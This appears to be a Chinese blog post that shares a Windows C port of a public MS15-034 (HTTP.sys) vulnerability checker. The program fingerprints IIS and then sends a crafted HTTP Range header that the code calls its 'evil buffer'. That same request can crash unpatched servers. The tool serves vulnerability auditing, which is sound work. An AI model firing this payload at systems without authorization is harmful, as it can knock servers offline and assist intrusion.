HTTP.sys 遠程執行代碼驗證工具

標籤：ror   img   etl   版本   pre   erro   size   strlen   漏洞   

漏洞資訊：

　　遠程執行代碼漏洞存在於 HTTP 協議堆棧 (HTTP.sys) 中，當 HTTP.sys 未正確分析經特殊設計的 HTTP 要求時會導致此漏洞。這裡將測試載入器改成windows版本方便工作。

代碼：

 

/* UNTESTED - MS15-034 Checker   THE BUG:    8a8b2112 56              push    esi    8a8b2113 6a00            push    0    8a8b2115 2bc7            sub     eax,edi    8a8b2117 6a01            push    1    8a8b2119 1bca            sbb     ecx,edx    8a8b211b 51              push    ecx    8a8b211c 50              push    eax    8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here*/#define WIN32_LEAN_AND_MEAN #include <windows.h>#include <stdio.h>#include <string.h>#include <stdlib.h>#include <winsock2.h> #include <Ws2tcpip.h>#pragma  comment(lib,"ws2_32.lib")int connect_to_server(char *ip,const int port){    int sockfd = 0, n = 0;    //SOCKET sockSrv;    struct sockaddr_in serv_addr;//初始化版本    WORD version(0);    WSADATA wsadata;    int socket_return(0);    version = MAKEWORD(2,0);    socket_return = WSAStartup(version,&wsadata);        if (socket_return != 0)    {        return 0;    }        if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)    {        printf("\n Error : Could not create socket %d\n",GetLastError());        return 1;    }    memset(&serv_addr, ‘0‘, sizeof(serv_addr));    serv_addr.sin_family = AF_INET;    //serv_addr.sin_port = htons(80);    serv_addr.sin_port = htons(port);    if (inet_pton(AF_INET, ip, &serv_addr.sin_addr)<=0)    {        printf("\n inet_pton error occured\n");        return 1;    }    if( connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)    {           printf("\n Error : Connect Failed \n");        exit(-1);          return 1;    }     return sockfd;}    int main(int argc, char *argv[]){    int n = 0;    int sockfd;    char recvBuff[1024];    // Check server    char request[] = "GET / HTTP/1.0\r\n\r\n";    // our evil buffer    char request1[] = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";    if (argc != 3)    {        printf("\n Usage: %s <ip of server> <port of server> \n",argv[0]);        return 1;    }     printf("[*] Audit Started\n");    sockfd = connect_to_server(argv[1],atoi(argv[2]));    send(sockfd, request, strlen(request),0);     recv(sockfd, recvBuff, sizeof(recvBuff)-1,0);    if (!strstr(recvBuff,"Microsoft"))    {        printf("[*] NOT IIS\n");        exit(1);    }    sockfd = connect_to_server(argv[1],atoi(argv[2]));    send(sockfd, request1, strlen(request1),0);    recv(sockfd, recvBuff, sizeof(recvBuff)-1,0);    if (strstr(recvBuff,"Requested Range Not Satisfiable"))    {        printf("[!!] Looks VULN\n");        exit(1);    }     else if (strstr(recvBuff,"The request has an invalid header name"))    {        printf("[*] Looks Patched");    }     else    {        printf("[*] Unexpected response, cannot discern patch status");    }    return 0;}

 

測試：

　　

 

HTTP.sys 遠程執行代碼驗證工具